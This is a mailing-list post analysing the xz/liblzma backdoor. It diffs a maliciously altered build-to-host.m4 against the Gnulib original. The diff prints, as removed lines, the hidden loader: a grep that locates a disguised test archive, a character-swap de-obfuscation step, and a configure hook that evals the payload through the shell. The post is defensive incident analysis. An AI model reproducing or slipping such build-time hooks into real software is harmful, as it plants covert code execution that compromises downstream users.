oss-sec mailing list archives
Re: backdoor in upstream xz/liblzma leading to ssh server compromise
From: Collin Funk <collin.funk1 () gmail com>
Date: Fri, 29 Mar 2024 23:21:19 -0700
I am not subscribed to this list, sorry for the missing Reply-To. It looks like they copied the build-to-host.m4 file from Gnulib and made malicious modifications, hoping no one would notice [1]. Hopefully this diff will help lead anyone investigating it in the correct direction: $ diff -u m4/build-to-host.m4 $GNULIB_REFDIR/m4/build-to-host.m4 --- m4/build-to-host.m4 2024-03-29 21:52:50.956049825 -0700 +++ /home/collin/.local/src/gnulib/m4/build-to-host.m4 2024-03-29 22:37:06.424791077 -0700 @@ -1,4 +1,4 @@ -# build-to-host.m4 serial 30 +# build-to-host.m4 serial 3 dnl Copyright (C) 2023-2024 Free Software Foundation, Inc. dnl This file is free software; the Free Software Foundation dnl gives unlimited permission to copy and/or distribute it, @@ -37,7 +37,6 @@ dnl Define somedir_c. gl_final_[$1]="$[$1]" - gl_[$1]_prefix=`echo $gl_am_configmake | sed "s/.*\.//g"` dnl Translate it from build syntax to host syntax. case "$build_os" in cygwin*) @@ -59,40 +58,14 @@ if test "$[$1]_c_make" = '\"'"${gl_final_[$1]}"'\"'; then [$1]_c_make='\"$([$1])\"' fi - if test "x$gl_am_configmake" != "x"; then - gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null' - else - gl_[$1]_config='' - fi - _LT_TAGDECL([], [gl_path_map], [2])dnl - _LT_TAGDECL([], [gl_[$1]_prefix], [2])dnl - _LT_TAGDECL([], [gl_am_configmake], [2])dnl - _LT_TAGDECL([], [[$1]_c_make], [2])dnl - _LT_TAGDECL([], [gl_[$1]_config], [2])dnl AC_SUBST([$1_c_make]) - - dnl If the host conversion code has been placed in $gl_config_gt, - dnl instead of duplicating it all over again into config.status, - dnl then we will have config.status run $gl_config_gt later, so it - dnl needs to know what name is stored there: - AC_CONFIG_COMMANDS([build-to-host], [eval $gl_config_gt | $SHELL 2>/dev/null], [gl_config_gt="eval \$gl_[$1]_config"]) ]) dnl Some initializations for gl_BUILD_TO_HOST. AC_DEFUN([gl_BUILD_TO_HOST_INIT], [ - dnl Search for Automake-defined pkg* macros, in the order - dnl listed in the Automake 1.10a+ documentation. - gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null` - if test -n "$gl_am_configmake"; then - HAVE_PKG_CONFIGMAKE=1 - else - HAVE_PKG_CONFIGMAKE=0 - fi - gl_sed_double_backslashes='s/\\/\\\\/g' gl_sed_escape_doublequotes='s/"/\\"/g' - gl_path_map='tr "\t \-_" " \t_\-"' changequote(,)dnl gl_sed_escape_for_make_1="s,\\([ \"&'();<>\\\\\`|]\\),\\\\\\1,g" changequote([,])dnl It is pretty clear that this line: gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null` is checking for and saving 'tests/files/bad-3-corrupt_lzma2.xz'. I don't think HAVE_PKG_CONFIGMAKE is used anywhere but I could be missing something. The '[$1]' in variable names seems to expand to 'locale'. See these lines from ./configure: gl_[$1]_prefix gl_[$1]_config gl_config_gt="eval \$gl_localedir_config" gl_localedir_config='`$ECHO "$gl_localedir_config" | $SED "$delay_single_quote_subst"`' gl_localedir_prefix=`echo $gl_am_configmake | sed "s/.*\.//g" Hopefully that can help someone who is more versed in Autoconf and m4. Thanks for the work testing and discovering this. [1] https://git.savannah.gnu.org/cgit/gnulib.git/tree/m4/build-to-host.m4 Collin
Current thread:
- SV: Re: backdoor in upstream xz/liblzma leading to ssh server compromise, (continued)
- SV: Re: backdoor in upstream xz/liblzma leading to ssh server compromise Markus Klyver (Mar 31)
- Re: Re: backdoor in upstream xz/liblzma leading to ssh server compromise Loganaden Velvindron (Mar 31)
- Re: Re: backdoor in upstream xz/liblzma leading to ssh server compromise Russ Allbery (Mar 30)
- Re: Re: backdoor in upstream xz/liblzma leading to ssh server compromise Mike O'Connor (Mar 30)
- Re: Re: backdoor in upstream xz/liblzma leading to ssh server compromise Florian Weimer (Mar 30)
- Re: backdoor in upstream xz/liblzma leading to ssh server compromise sjw (Mar 29)
- Re: backdoor in upstream xz/liblzma leading to ssh server compromise Alexander E. Patrakov (Mar 30)
- Re: backdoor in upstream xz/liblzma leading to ssh server compromise Axel Beckert (Mar 30)
- Re: backdoor in upstream xz/liblzma leading to ssh server compromise Salvatore Bonaccorso (Mar 30)
- Re: backdoor in upstream xz/liblzma leading to ssh server compromise Axel Beckert (Mar 30)
- Re: backdoor in upstream xz/liblzma leading to ssh server compromise Collin Funk (Mar 30)
- Re: backdoor in upstream xz/liblzma leading to ssh server compromise Jonathan Schleifer (Mar 30)
- Re: Re: backdoor in upstream xz/liblzma leading to ssh server compromise Rein Fernhout (Levitating) (Mar 30)
- Re: Re: backdoor in upstream xz/liblzma leading to ssh server compromise Jonathan Schleifer (Mar 30)
- Re: Re: backdoor in upstream xz/liblzma leading to ssh server compromise Rein Fernhout (Levitating) (Mar 30)
- Re: Re: backdoor in upstream xz/liblzma leading to ssh server compromise Fay Stegerman (Mar 30)
- Re: Re: backdoor in upstream xz/liblzma leading to ssh server compromise Rein Fernhout (Levitating) (Mar 30)
- RE: backdoor in upstream xz/liblzma leading to ssh server compromise Thomas Ward (Mar 30)